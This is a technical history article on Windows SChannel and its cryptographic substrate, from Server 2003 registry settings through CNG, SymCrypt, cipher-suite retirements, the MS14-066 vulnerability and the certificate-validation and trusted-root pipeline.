The shape of the SCHANNEL\ hive on a representative Server 2003 R2 box, reconstructed from Microsoft Knowledge Base article KB245030 ("How to restrict the use of certain cryptographic algorithms and protocols in Schannel.dll") and the modern Microsoft Learn tls-registry-settings page that preserves the same structural document [@ms-learn-tls-registry-settings], is shown below.Microsoft Knowledge Base article KB245030 ("How to restrict the use of certain cryptographic algorithms and protocols in Schannel.dll") is the *origin document* for the four-sub-key SCHANNEL\ registry pattern this section dumps. The original support.microsoft.com URL now returns HTTP 404; the same content lives at Microsoft Learn's tls-registry-settings page [@ms-learn-tls-registry-settings]. The four sub-keys (Protocols, Ciphers, Hashes, KeyExchangeAlgorithms) have been stable since Windows 2000. The DWORD convention is itself the agility affordance: 0xffffffff means "enabled," 0 means "disabled," and the Server versus Client role split lets an admin disable SSL 2.0 server-side without breaking outbound HTTPS client-side during the transition.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\
  Protocols\
    SSL 2.0\Server\Enabled = 0xffffffff   ; ON by default on 2003 R2
    SSL 3.0\Server\Enabled = 0xffffffff
    TLS 1.0\Server\Enabled = 0xffffffff
    ; TLS 1.1 / 1.2 sub-keys absent -- those protocols do not exist on 2003 R2
  Ciphers\
    RC4 128/128\Enabled        = 0xffffffff
    RC4 56/128\Enabled         = 0xffffffff   ; export-grade, still present
    RC4 40/128\Enabled         = 0xffffffff   ; export-grade
    Triple DES 168\Enabled     = 0xffffffff
    DES 56/56\Enabled          = 0xffffffff
    RC2 40/128\Enabled         = 0xffffffff   ; export-grade
    NULL\Enabled               = 0
  Hashes\
    MD5\Enabled                = 0xffffffff
    SHA\Enabled                = 0xffffffff
  KeyExchangeAlgorithms\
    Diffie-Hellman\Enabled     = 0xffffffff
    PKCS\Enabled               = 0xffffffff   ; RSA key transport

Notice what is not there. No TLS 1.1, no TLS 1.2, no AES sub-key (AES ALG_ID constants arrived in rsaenh.dll via XP SP3 and Server 2003 SP2 but SChannel had to learn the suite-name strings separately). No ECC primitive at all -- CryptoAPI 1.0 could not express named curve parameters in the ALG_ID + key BLOB shape, so no amount of registry editing could unlock an ECDHE cipher suite on a 2003-era box. The four-sub-key layout (Protocols, Ciphers, Hashes, KeyExchangeAlgorithms) is the configuration surface; what the surface can offer is bounded by the substrate underneath it.

The CSP layer underneath: `PROV_RSA_SCHANNEL` and `CALG_TLS1PRF`

On the dispatch side of that same XP / 2003 box, SChannel relied on two CryptoAPI 1.0 Cryptographic Service Providers in particular. The Microsoft Learn "Cryptographic Provider Types" page enumerates the provider types Microsoft shipped [@ms-learn-cryptographic-provider-types]:

PROV_RSA_SCHANNEL (provider type 12) -- the SChannel-private CSP. It carried the TLS-specific primitives: the CALG_TLS1PRF pseudorandom function (algorithm identifier 0x0000800a), the CALG_SCHANNEL_MASTER_HASH and CALG_SCHANNEL_MAC_KEY and CALG_SCHANNEL_ENC_KEY key-derivation handles, and (because the substrate had to negotiate three handshake protocols) the CALG_SSL2_MASTER and CALG_PCT1_MASTER constants documented on the Microsoft Learn ALG_ID page [@ms-learn-alg-id].
PROV_RSA_FULL / PROV_RSA_AES (rsaenh.dll) -- the general-purpose enhanced CSP, which carried the bulk symmetric primitives the cipher list named (CALG_RC4, CALG_DES, CALG_3DES, eventually CALG_AES_128, CALG_AES_256).

Both CSPs were loaded by CryptAcquireContext against the HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider registry hierarchy. Neither was extensible without an rsaenh.dll (or analogous) revision and a CSP-rev ship cycle. The registry hive let an operator turn primitives off; it could not let an operator turn a new primitive on, because the CSP catalog itself was the menu. Adding ECC to that menu was not a configuration problem -- it required a different substrate.

The `SSL Cipher Suite Order` GPO -- and why it is a Vista-era artifact, not a 2003-era one

Cipher-suite ordering (as opposed to enablement) was not exposed as an administrative tunable until Windows Vista and Server 2008 added the Computer Configuration > Administrative Templates > Network > SSL Configuration Settings > SSL Cipher Suite Order Group Policy. The current Microsoft Learn "Manage Transport Layer Security (TLS)" page documents the format verbatim: "a strict comma delimited format. Each cipher suite string ends with a comma to the right side of it... the list of cipher suites is limited to 1,023 characters." [@ms-learn-manage-tls] A representative XP-era ordering string -- if the GPO had existed for the operator to set -- would have read something like TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA,TLS_RSA_WITH_DES_CBC_SHA,..., walking the actual Server 2003 default lineup that the CSP catalog could deliver. The fact that this lever did not exist on 2003 -- the operator was limited to flipping Ciphers\<name>\Enabled DWORDs in the per-cipher sub-tree -- is itself evidence of how the operator-facing SChannel surface matured one Windows release at a time.

No enumeration tool on Server 2003

There is no Get-TlsCipherSuite cmdlet on Windows Server 2003. Windows PowerShell itself only shipped (as KB968930) in 2009, and the TLS PowerShell module first appeared in Windows 8 and Server 2012 [@ms-learn-get-tlsciphersuite]. On a 2003-era box the empirical answer to "what does this server actually negotiate?" was either a reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server" /v Enabled against the registry sub-tree above, or -- for what the client actually picked -- an outbound Internet Explorer 6 trace, or -- for what the server actually accepted -- a TCP-connect dump against port 443 with a TLS scanner of the era (typically openssl s_client -connect host:443 -cipher ALL running on a separately-administered Linux box). The operator-visible inventory tool an admin reaches for in 2026 is itself a CNG-era artifact.

The agility split: configuration vs. substrate

Here is the structural problem that XP-era SChannel revealed. The configuration surface was getting more agile -- an operator could turn cipher suites on and off, prefer one over another, disable an entire protocol version -- but the engine underneath was not. New primitives still required a CSP rev. New named curves were unrepresentable. SHA-256 in TLS handshake signatures was a several-year project.

A useful metaphor: configuration agility without substrate agility is a treadmill. You can disable bad cipher suites at will. You cannot add a new family of primitives without rebuilding the engine. By the mid-2000s Microsoft had two options. Patch CAPI in place forever -- absorb every new algorithm as a new ALG_ID constant, a new CSP DLL, a new BLOB type, a new round of partner re-certification. Or ship a successor.

Every Microsoft technology that needed cryptography was caught in the same trap as SChannel. IPsec, EFS, BitLocker's predecessors, S/MIME in Outlook, smart-card login, Authenticode code-signing verification -- all dispatched through CryptoAPI 1.0 CSPs. The agility problem was not localised to TLS; it was the *Windows cryptography* problem. The successor Microsoft built would therefore have to be the substrate for *all* of these consumers, not just for SChannel. That is exactly what CNG ended up being.

They chose the second. The next section is the eureka moment the rest of the article hangs on.

4. CNG: Where Vista Made Algorithm Agility First-Class (January 2007)

Vista is where the article's clock starts. In January 2007 Microsoft did not patch CryptoAPI 1.0; it shipped a parallel substrate alongside it: Cryptography API: Next Generation. The Microsoft Learn portal still describes it in one sentence that doubles as the article's thesis: "CNG is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." [@ms-learn-cng-portal]

CNG is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior. -- Microsoft Learn, *Cryptography API: Next Generation* portal [@ms-learn-cng-portal]

The two splits that look prosaic in the documentation -- BCrypt for primitives, NCrypt for key custodians -- are, in fact, the single architectural decision that makes the rest of this article's twenty-year story possible.

The post-Vista replacement for CryptoAPI 1.0. CNG splits cryptography into two API surfaces. **BCrypt** (`bcrypt.dll`) handles primitive operations (hashes, ciphers, key-agreement, signing) and addresses algorithms by string identifier through `BCryptOpenAlgorithmProvider`. **NCrypt** (`ncrypt.dll`) handles key storage and custody through pluggable Key Storage Providers (KSPs). CNG is the substrate Microsoft built so that every later cryptographic primitive could be added as a provider update rather than an API rewrite [@ms-learn-cng-portal].

BCrypt: algorithms become strings

The shape of the BCrypt API is the eureka moment.

BCRYPT_ALG_HANDLE hAlg;
NTSTATUS status = BCryptOpenAlgorithmProvider(
    &hAlg,
    BCRYPT_AES_ALGORITHM,       // string identifier
    NULL,                        // default provider
    0);

BCRYPT_AES_ALGORITHM is the literal string "AES". The handle returned by BCryptOpenAlgorithmProvider does not encode which DLL implements AES; it encodes the contract that the resulting handle satisfies (block cipher, configurable mode, configurable key length). The same shape later admits BCRYPT_ECDH_P256_ALGORITHM, BCRYPT_SHA384_ALGORITHM, BCRYPT_CHACHA20_POLY1305_ALG_HANDLE, and -- in 2024-2026 -- BCRYPT_MLKEM_ALG_HANDLE with parameter-set selectors such as BCRYPT_MLKEM_PARAMETER_SET_768 [@ms-learn-cng-mlkem-examples].

BCRYPT_MLKEM_ALG_HANDLE resolves through the exact same hash-table lookup as BCRYPT_AES_ALGORITHM did in 2007. The substrate did not need an architectural change to absorb a brand-new algorithm family seventeen years later -- the dispatch was already built for it.

NCrypt: key custodians become pluggable

**BCrypt** is the CNG API for *primitives* -- arithmetic that takes plaintext and a key and returns ciphertext (or hash, or signature). **NCrypt** is the CNG API for *key custodians* -- objects that own a private key and expose only signing, decryption, and key-derivation operations. The split lets a TLS server hold a private key whose material it never sees: SChannel calls `NCryptSignHash` against an `NCRYPT_KEY_HANDLE`, and the handle's owning KSP (software, smart card, or TPM) performs the operation in its own trust boundary. A CNG-loadable module that owns the lifecycle and operations of a private key. Microsoft ships three out of the box: the **Microsoft Software KSP** (keys at rest in the user or machine profile, protected by DPAPI), the **Microsoft Smart Card KSP** (keys on a PIV / CCID device), and the **Microsoft Platform Crypto Provider** (keys non-exportable from the TPM 2.0). Third parties ship KSPs for HSMs and cloud KMS systems. SChannel sees only the `NCRYPT_KEY_HANDLE`; the custodian is opaque to the SSP.

How SChannel uses CNG

After Vista, SChannel's internals look very different. The cipher-suite registry resolves to BCrypt algorithm identifiers rather than ALG_ID constants. The credentials handle that an IIS worker process receives from AcquireCredentialsHandle holds an NCRYPT_KEY_HANDLE for the server certificate's private key; signing operations during the handshake (CertificateVerify) dispatch through NCryptSignHash to whichever KSP owns the key.

flowchart TD A["IIS / SQL Server / SslStream / WinHTTP"] --> B[SChannel SSP -- schannel.dll] B --> C["BCrypt -- bcrypt.dll"] B --> D["NCrypt -- ncrypt.dll"] C --> E["SymCrypt primitive engine"] C --> F["Third-party BCrypt providers"] D --> G[Microsoft Software KSP] D --> H[Smart Card KSP] D --> I["Microsoft Platform Crypto Provider -- TPM 2.0"] D --> J["HSM / cloud KMS KSPs"] E --> K[(Algorithm dispatch by string identifier)] G --> L[(Key operations by opaque handle)]

The agility property, stated forward

From 2007 onward, adding a primitive to Windows TLS is a CNG-provider-update problem, not an SChannel-rewrite problem. The application surface stays put. IIS does not get rebuilt. SslStream does not change. The cipher suite negotiated on the wire is whatever the SChannel cipher-suite registry currently exposes; the cipher-suite registry resolves to whatever BCrypt providers are loaded.

Key idea: Algorithm agility is not a property of TLS-the-protocol. The cipher-suite codepoint is the minor half of the work; the major half is having a substrate that resolves a new algorithm identifier without rebuilding every consumer. CNG's BCrypt dispatch is what that substrate looks like in Windows. The protocol's cipher-suite registry is enumerated; the substrate's algorithm registry is open. That asymmetry is the entire game.

SymCrypt as the parallel track

Microsoft's unified, FIPS 140-validated cryptographic primitive engine. Niels Ferguson began the project in **late 2006** with the first sources committed in February 2007 [@symcrypt-github] -- nearly a decade before Heartbleed. SymCrypt became the primary library for symmetric algorithms starting with Windows 8 and the primary library for all algorithms across Windows since the Windows 10 1703 release in March 2017. Microsoft open-sourced SymCrypt under the MIT license in July 2019 [@symcrypt-github]. Its release-by-release primitive timeline lives in the public CHANGELOG [@symcrypt-changelog].

This timing matters because the original framing many readers carry around -- "Microsoft rewrote its crypto engine after Heartbleed" -- is historically wrong on every axis. SymCrypt predates Heartbleed by seven years [@symcrypt-github]. Heartbleed was an OpenSSL heartbeat-extension bug and did not affect SChannel because SChannel does not implement that code path [@nvd-cve-2014-0160]. The article's Section 6 treats this conflation in detail. For now, the honest framing is: SymCrypt was the long, quiet maturation of CNG's primitive layer over a decade, designed by a working Microsoft cryptographer for a substrate already built to accept it.Niels Ferguson's publicly visible work -- including his co-authorship of Cryptography Engineering with Bruce Schneier and Tadayoshi Kohno [@schneier-cryptography-engineering] -- is the closest the public has to a primitive-design rationale for what eventually became SymCrypt.

CNG was Microsoft betting that Windows could keep its Win32 API contract stable while every cryptographic primitive underneath it rotated. The next four sections are the receipts on that bet -- five complete cipher-suite rotations, a parsing-path RCE that almost broke trust in the substrate, and a present-day post-quantum pivot that is the cleanest agility receipt of all.

5. Five Generations of Cipher-Suite Rotation, 2009 to 2025

Between Windows 7 in 2009 [@ms-learn-tls-cipher-suites-windows-7] and the rolling Windows Server 2022 / 2025 default lists [@ms-learn-tls-cipher-suites-server-2022], Microsoft rotated every primitive in SChannel's default cipher list at least five times. Not once did IIS, SQL Server, or SslStream get a source-code change because of it. Those five rotations are the agility receipts.

The rough shape of the rotations:

Generation	Window	New primitive(s)	Old primitive(s) retired	Disablement mechanism	Cryptographic indictment
G1	Win7 / 2008 R2, Oct 2009	ECDHE key exchange + AES-GCM AEAD	Static RSA key transport + AES-CBC + HMAC	New cipher-suite registrations [@ms-learn-tls-cipher-suites-windows-7]	Lucky13 (2013), BEAST (2011) [@beast-pdf]
G2	KB2868725, Nov 12 2013 -> off-default 2016	(none added)	RC4 stream cipher	`SCH_USE_STRONG_CRYPTO` registry value [@ms-advisory-2868725]	RC4 NOMORE (75-hour cookie recovery) [@usenix-rc4nomore]
G3	Win10 v1903, May 2019 Update	(none added)	3DES (64-bit block)	Cipher-suite default-off in cipher list [@ms-learn-cipher-suites-schannel]	SWEET32 (785 GB / less than 48 h) [@sweet32-info]
G4	2016-2022	SHA-256 / SHA-384 handshake signatures	SHA-1 handshake signatures and SHA-1 trust-store roots	Microsoft Trusted Root Program distrust events; chain-engine policy	SHAttered (Feb 2017) [@iacr-eprint-shattered]
G5	2020-2025	TLS 1.3 (default-on Win11 / Server 2022)	TLS 1.0 and TLS 1.1	`SCHANNEL\Protocols\TLS 1.0\<role>\DisabledByDefault` [@ms-learn-tls-registry-settings]	Decade of attack research (BEAST, POODLE, FREAK, Logjam) [@weakdh-logjam]

Each row below adds the engineering detail that the table compresses.

G1 -- ECDHE plus AES-GCM (Windows 7 / Server 2008 R2, October 2009)

A key-agreement protocol where both parties generate a fresh elliptic-curve key pair for every handshake and exchange public points; the shared secret is never derived from the long-term server certificate's private key. ECDHE provides **forward secrecy**: compromising the server's RSA or ECDSA private key tomorrow does not let an adversary decrypt connections recorded today. ECDHE cipher suites first appear in SChannel on Windows 7 / Server 2008 R2 in 2009 [@ms-learn-tls-cipher-suites-windows-7]. A construction that encrypts plaintext and produces an authentication tag in a single operation, with neither output usable in isolation. AEAD ends an entire class of "mac-then-encrypt vs. encrypt-then-mac" padding-oracle bugs (Lucky13, POODLE-style attacks on CBC) by removing the separable padding step entirely. The AEAD framework is introduced in RFC 5246 §6.2.3.3 [@rfc-5246]; AES-GCM is the canonical instantiation on Windows.

The Windows 7 cipher-suite roster enumerates ECDHE-based suites like TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 and the AES-GCM AEAD suites TLS_RSA_WITH_AES_256_GCM_SHA384 and TLS_RSA_WITH_AES_128_GCM_SHA256 [@ms-learn-tls-cipher-suites-windows-7]. These suites simply did not exist in the SChannel cipher-suite list of XP / Server 2003. Microsoft was able to add them because the CNG substrate, two years old by Windows 7's RTM, dispatched algorithms by string; the cipher-suite registry just gained new rows that resolved to BCRYPT_ECDH_P256_ALGORITHM and BCRYPT_AES_ALGORITHM with the GCM chaining mode set.

G2 -- RC4 deprecation (KB2868725, November 12 2013, default-off 2016)

In November 2013 Microsoft published Security Advisory 2868725, "Update for Disabling RC4," which introduced the SCH_USE_STRONG_CRYPTO flag in the SCHANNEL_CRED structure and the matching registry mechanism [@ms-advisory-2868725]. The press around the advisory was driven by the BEAST attack (2011) -- whose practical mitigation had been to prefer RC4 over CBC suites to dodge the CBC implicit-IV bug -- and by mounting attacks against RC4 itself by AlFardan et al. and others.

The full cryptographic indictment landed at USENIX Security in August 2015: Mathy Vanhoef and Frank Piessens published "All Your Biases Belong to Us: Breaking RC4 in WPA-TKIP and TLS," demonstrating a 75-hour HTTPS cookie recovery against RC4-secured TLS [@usenix-rc4nomore]. Six months earlier, Andrei Popov of Microsoft Corp. had authored RFC 7465, "Prohibiting RC4 Cipher Suites" [@rfc-7465]. Edge and IE 11 disabled RC4 by default in late 2016; SChannel's RC4 suites moved to off-by-default on the same trajectory [@ms-learn-cipher-suites-schannel].RFC 7465 ("Prohibiting RC4 Cipher Suites in TLS") was authored by A. Popov of Microsoft Corp. [@rfc-7465] -- the same engineer whose name is on the current Microsoft Learn SChannel SSP overview page [@ms-learn-schannel-ssp]. Microsoft's anti-RC4 push was Microsoft-led at the IETF, not just internally.

G3 -- 3DES retirement (Windows 10 v1903, May 2019 Update)

The cryptographic indictment for 3DES is a textbook example of the block-cipher birthday bound. A 64-bit block cipher reaches a 50% probability of an internal collision after roughly $2^{32}$ encrypted blocks under a single key -- around 32 GB. The SWEET32 paper (Bhargavan and Leurent, ACM CCS 2016) translated that bound into a practical TLS cookie-recovery attack: with 785 GB of induced HTTP traffic over a long-lived 3DES-encrypted connection, an adversary could recover an HTTPS cookie in less than two days [@sweet32-info].

Microsoft moved 3DES cipher suites to off-by-default starting with Windows 10 version 1903 (May 2019 Update). The exact pivot is visible in the per-OS Microsoft Learn cipher-suite tables: TLS_RSA_WITH_3DES_EDE_CBC_SHA appears in the default-enabled list for Windows 10 v1709 and was removed from the default-enabled list for v1903 onward [@ms-learn-cipher-suites-schannel][@ms-learn-tls-cipher-suites-server-2022]. The registry-toggle mechanism is the same SCHANNEL\Ciphers\<algorithm>\Enabled shape that has been in place since the XP era [@ms-learn-tls-registry-settings]. Crucially, no application changed -- IIS, SQL Server, and SslStream simply stopped negotiating 3DES because the cipher list no longer offered it.

G4 -- SHA-1 sunset (2016 to 2022)

SHA-1 deprecation in SChannel was not a single registry flip; it was a coordinated rotation across the certificate trust pipeline (covered in Section 7), the handshake signature suite, and the trust-store membership of root CAs that issued SHA-1 leaves. Two cryptographic indictments did the load-bearing work. The first was protocol-level: SLOTH (Bhargavan and Leurent, NDSS 2016 [@mitls-sloth][@iacr-eprint-sloth]) showed that an attacker able to compute MD5 or SHA-1 transcript-hash collisions could impersonate one party to the other inside TLS 1.2's client-authenticated handshake by forging matching CertificateVerify signatures -- a direct attack on authentication, not on the primitive's collision resistance in the abstract. The second was primitive-level: SHAttered (Stevens, Bursztein, Karpman, Albertini, Markov; February 2017 [@iacr-eprint-shattered]) supplied the concrete colliding PDF pair that closed the public debate about SHA-1's safety margin, published as IACR ePrint 2017/190. Two indictments together -- protocol-level via SLOTH, primitive-level via SHAttered -- is the empirically-correct framing for the SHA-1 retirement timeline.

For SChannel specifically the rotation was: SHA-256 / SHA-384 handshake signatures for new connections; chain-engine policy stops accepting SHA-1 leaves for id-kp-serverAuth; and the Microsoft Trusted Root Program distrust events that retired SHA-1 code-signing and TLS certificates from authrootstl.cab over 2016 to 2022. Section 7 walks the trust pipeline in detail; for the agility argument what matters is that none of these required an SslStream change.

G5 -- TLS 1.0 / 1.1 disablement (2020 to 2025)

Microsoft's rollout used the registry pattern from Section 3. Per-application disablement first -- IE 11, Edge legacy, .NET via ServicePointManager.SecurityProtocol, individual server roles -- then OS-level defaults in 2024 and 2025 [@ms-learn-tls-registry-settings]. The TLS 1.0 / 1.1 lifecycle is the article's clearest data point on the difference between "the substrate can rotate" and "the world will move" (Section 11 returns to this).

The TLS 1.3 side of G5 -- the positive half of the protocol-version rotation -- shipped default-on in Windows Server 2022 (GA August 2021) and Windows 11 (GA October 5, 2021). Windows 10 and Server 2019 SChannel remain TLS 1.2 only [@ms-learn-tls-cipher-suites-server-2022]. The three TLS 1.3 AEAD suites (TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256) [@rfc-8446] became the default lineup -- another row of new entries in the cipher-suite registry, with the BCrypt providers behind them already shipping.

Five rotations, zero application source changes. But one episode from the same era did break the calm -- a parsing-path remote code execution in SChannel itself, published on Patch Tuesday in November 2014, that the press still routinely confuses with Heartbleed [@ms14-066]. The agility substrate did not protect Windows from that one.

6. MS14-066 / WinShock: What Happened, What It Was Not

If you searched "SChannel 2014 vulnerability" in late 2014 you got two stories blended together: Heartbleed (April) and the November SChannel RCE everyone called WinShock. They are not the same story. They are not the same vulnerability. They are not even the same vendor. The blending is the single most-misremembered SChannel event, and this article exists in part to set the record straight.

What MS14-066 actually was

On Patch Tuesday, November 11, 2014, Microsoft published Security Bulletin MS14-066 -- "Vulnerability in Schannel Could Allow Remote Code Execution (2992611)" [@ms14-066]. The vulnerability identifier was CVE-2014-6321. The bulletin's first sentence reads, verbatim:

This security update resolves a privately reported vulnerability in the Microsoft Secure Channel (Schannel) security package in Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted packets to a Windows server. -- Microsoft Security Bulletin MS14-066, November 11, 2014 [@ms14-066]

The technical character of the bug was a pre-authentication remote code execution in SChannel's TLS message-parsing path. The NVD record summarises it as "Schannel in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via crafted packets" [@nvd-cve-2014-6321]. US-CERT issued Alert TA14-318A confirming the severity and noting the wide platform coverage [@uscert-ta14-318a]; CERT/CC published vulnerability note VU#505120 with the same substance [@certcc-vu505120]. The bulletin was disclosed under coordinated vulnerability disclosure on the standard Patch Tuesday cadence; IBM X-Force researcher Robert Freeman is publicly credited as the discoverer. The "privately reported" phrasing in MS14-066 [@ms14-066] is Microsoft's standard nomenclature for coordinated-disclosure intake, not a claim that the discovery was internal to Microsoft.

What MS14-066 was not

It was not Heartbleed. Heartbleed (CVE-2014-0160), disclosed April 7, 2014, was a flaw in OpenSSL's TLS Heartbeat extension code path [@nvd-cve-2014-0160]. The bug let an attacker over-read OpenSSL process memory by sending a Heartbeat request whose declared payload length exceeded the actual payload. SChannel does not implement the OpenSSL Heartbeat extension; that code simply did not exist in schannel.dll. Microsoft's MSRC publicly noted in April 2014 that Microsoft Services were not affected by the Heartbleed vulnerability -- the substance held because the affected codebase was OpenSSL's, not Microsoft's [@nvd-cve-2014-0160].The original April 2014 MSRC blog post stating SChannel was unaffected by Heartbleed has migrated and renders only its page chrome today. The substance is independently anchored by the NVD record for CVE-2014-0160, which explicitly scopes the vulnerability to OpenSSL 1.0.1 through 1.0.1f.

It was not "silently patched," at least not at the headline level. CVE-2014-6321 had a public Patch Tuesday bulletin, contemporary Krebs and NVD coverage, US-CERT and CERT/CC alerts, and proof-of-concept walkthroughs from BeyondTrust and Security Sift within months [@certcc-vu505120][@uscert-ta14-318a]. The "silently patched" framing in the press is the residue of a real but narrower fact: the same KB shipped additional Schannel hardening fixes that were not separately bulletined.The "silently patched" framing of MS14-066 is itself the residue of a real fact -- the November 11, 2014 KB included Schannel hardening fixes that were not separately bulletined. The headline CVE itself was very much public, and the discovery is publicly credited to IBM X-Force researcher Robert Freeman under coordinated vulnerability disclosure. This article does not assign specific CVE IDs to the bundled hardening extras, in line with the project's premise-audit discipline.

What it occasioned

Three lasting effects of MS14-066 are worth naming.

First, the cipher-suite expansion in the same KB. The patch bundled new TLS 1.2 cipher suites (the ECDHE-RSA suites that Windows 7 and Server 2008 R2 had partially supported, broadened across the entire then-supported family). Some operators were caught off guard by the new lineup; the registry-toggle pattern from Section 3 was what got them out of the bind.

Second, a measurable uptick in external SChannel fuzzing. After 2014, the public TLS-stack-testing community treated SChannel as a first-class target, not as a closed-source black box no one could meaningfully probe. The most visible artifact is Hubert Kario's TLS-Fuzzer at Red Hat -- a test suite that, in the project's own framing, "doesn't check only that the system under test didn't crash, it checks that it returned correct error messages" [@tlsfuzzer-github]. Section 11 returns to TLS-Fuzzer as the closest public substitute for a behavioural specification of SChannel.

Third, the lesson the substrate could not absorb: algorithm-agility does not extend to the parsing path. The wire-format state machine has to be correct because no provider model can fix a bug in schannel.dll itself. CNG could rotate primitives without rewriting SChannel; CNG could not rotate SChannel's TLS message parser. That asymmetry is structural and remains true today.

What it was not, part two: not the trigger for SymCrypt

Some narratives connect MS14-066 to a "SChannel rewrite" or a "FIPS rewrite" project that followed. The dates do not support either framing. SymCrypt was started by Niels Ferguson in late 2006, with the first sources committed in February 2007 [@symcrypt-github] -- seven years before Heartbleed and eight years before MS14-066. SymCrypt became the primary library for symmetric algorithms with Windows 8 (October 2012, before MS14-066) and the primary library for all algorithms across Windows starting with the Windows 10 1703 release in March 2017. Open-sourcing followed under the MIT license in July 2019 [@symcrypt-github]. The honest story is that SymCrypt was the maturation of CNG's primitive layer over a decade; it had no causal relationship to either 2014 disclosure.

This article refuses to assert any causal link between Heartbleed and SymCrypt because the timeline does not support it. SymCrypt began in late 2006; Heartbleed was disclosed in April 2014. SymCrypt's role as the Windows-wide primary crypto library lands with Windows 10 1703 in March 2017 [@symcrypt-github]. Conflations of this kind are how the security-pop-press version of history overwrites the engineering version. The agility argument is stronger, not weaker, when the actual causal chains are preserved.

MS14-066 taught Microsoft that the substrate's algorithm-agility property does not extend to the parsing path -- the wire-format state machine has to be correct because no provider model can fix a bug in schannel.dll itself. The next section turns to the other load-bearing path: not the bytes on the wire, but the certificate the server presents to authenticate.

7. The Certificate-Validation Pipeline: `CertGetCertificateChain`, OCSP, and the Microsoft Trusted Root Program

The other half of any TLS handshake is trust. Bytes can be encrypted with the strongest AEAD in the SymCrypt CHANGELOG and the handshake can use a quantum-resistant key exchange -- and the whole exchange still means nothing if the certificate the server presents traces back to an attacker-controlled CA. On Windows, that whole question routes through one API: CertGetCertificateChain.

The chain engine

CertGetCertificateChain walks from leaf to trusted root using Authority Key Identifier / Subject matching, fetches any missing intermediates via the certificate's Authority Information Access (AIA) caIssuers URL, and resolves against the local Microsoft Trusted Root Store. The store itself is kept current through the crypt32.dll auto-update mechanism, which downloads a signed authrootstl.cab periodically and updates the trust list in place.

Per-certificate checks follow the X.509 PKI profile (RFC 5280, May 2008) [@rfc-5280]:

Signature verification -- each cert is signed by the next-up cert's private key.
Validity -- notBefore / notAfter within the current time.
Key Usage and Extended Key Usage -- the leaf must include id-kp-serverAuth (1.3.6.1.5.5.7.3.1) for a TLS server presentation, and the chain's intermediates must permit serverAuth in their EKU constraints if they declare any.
Basic Constraints -- non-leaf certs must have cA=TRUE.
Name Constraints -- per RFC 5280 §4.2.1.10, intermediates may declare permittedSubtrees and excludedSubtrees over DNS names, IP ranges, and other name forms; the chain engine enforces these against the leaf's SAN.
Revocation -- per-cert, against the chosen revocation source.

CertVerifyCertificateChainPolicy then layers protocol-specific overlays on top of that purely structural validation. The most important for TLS is CERT_CHAIN_POLICY_SSL, which adds the SNI / SAN hostname match and TLS-specific server-auth constraints.

flowchart TD A["Leaf certificate from TLS handshake"] --> B["Chain engine -- CertGetCertificateChain"] B --> C{"Path build via AKI / SKI matching, AIA caIssuers fetch"} C --> D["Per-cert structural checks (RFC 5280)"] D --> E{"Revocation source"} E --> F[CRL distribution point] E --> G[OCSP responder] E --> H[OCSP stapled response] D --> I["CertVerifyCertificateChainPolicy"] I --> J{"CERT_CHAIN_POLICY_SSL -- SNI / SAN match, serverAuth EKU"} J --> K[Chain valid for TLS server] F --> I G --> I H --> I

Revocation: CRL, OCSP, OCSP stapling

The **Online Certificate Status Protocol** (RFC 6960) lets a client ask the issuing CA's OCSP responder whether a specific certificate is revoked, by serial number [@rfc-6960]. Plain OCSP is a separate request to the CA on every connection, which leaks visited hostnames to the CA and adds latency. **OCSP stapling** lets the server fetch a fresh signed OCSP response on a schedule and "staple" it into the TLS handshake via the `status_request` extension -- the client gets the same revocation proof without the side channel. SChannel consumes stapled OCSP responses through the `status_request` extension (RFC 6066 §8 for TLS 1.2, RFC 8446 §4.4.2.1 for TLS 1.3 [@rfc-8446]) and feeds the result into the chain engine.

A practical SChannel deployment combines CRL fetching, OCSP, and OCSP stapling: stapling preferred when present, OCSP fallback when not, CRL as the long-tail safety net. IIS's stapling support is on by default in modern releases; turning it off is the wrong default for any internet-facing endpoint.

The Microsoft Trusted Root Program and the CCADB

SChannel's trust posture inherits the Microsoft Trusted Root Program's membership decisions. Microsoft does not run the trust program in isolation. It participates in the Common CA Database (CCADB) alongside Mozilla, Google, and Apple, sharing root inclusion / removal / audit data across the major root stores [@ccadb-resources]. The CCADB Resources page lists the public extractions (Microsoft's TLS roots, Mozilla's TLS roots, code-signing roots, S/MIME roots) and the program-specific report URLs.

The governance flow is documented end-to-end on the Microsoft Trusted Root Program program-requirements page [@ms-trusted-root-program-requirements]. Membership requires annual WebTrust or ETSI EN 319 411 audits, full CCADB disclosure of the PKI hierarchy, and adherence to the technical requirements (minimum key sizes, signature-algorithm policy, extension constraints, name-form profiles). Distrust decisions can be triggered by (a) CCADB-coordinated cross-vendor consensus where Microsoft acts alongside Mozilla, Apple, and Google; (b) unilateral Microsoft action when the program judges a CA below the bar; or (c) audit-failure findings that fail to remediate inside an agreed window.

Propagation to Windows clients goes through two signed trust lists distributed via the Automatic Root Update mechanism: authrootstl.cab carries the currently-trusted roots together with per-EKU enablement bits, and disallowedcertstl.cab is the explicit untrust list. Both are fetched by crypt32.dll from http://ctldl.windowsupdate.com/... on a periodic schedule and consumed by the chain engine on its next chain build. The SChannel SSP itself does not maintain a separate trust list; it inherits whatever CertGetCertificateChain resolves against the auto-updated stores.

flowchart TB A[CA submits audit, CCADB disclosure, technical compliance] --> B[Microsoft Trusted Root Program review] B --> C{"Decision -- include, distrust, NotBefore-date schedule"} C --> D[CCADB cross-vendor coordination -- Mozilla, Apple, Google] C --> E[authrootstl.cab updates] C --> F[disallowedcertstl.cab updates] E --> G[ctldl.windowsupdate.com distribution] F --> G G --> H[crypt32.dll Automatic Root Update on client] H --> I[CertGetCertificateChain consults updated stores] I --> J[SChannel SSP handshake trust decision]

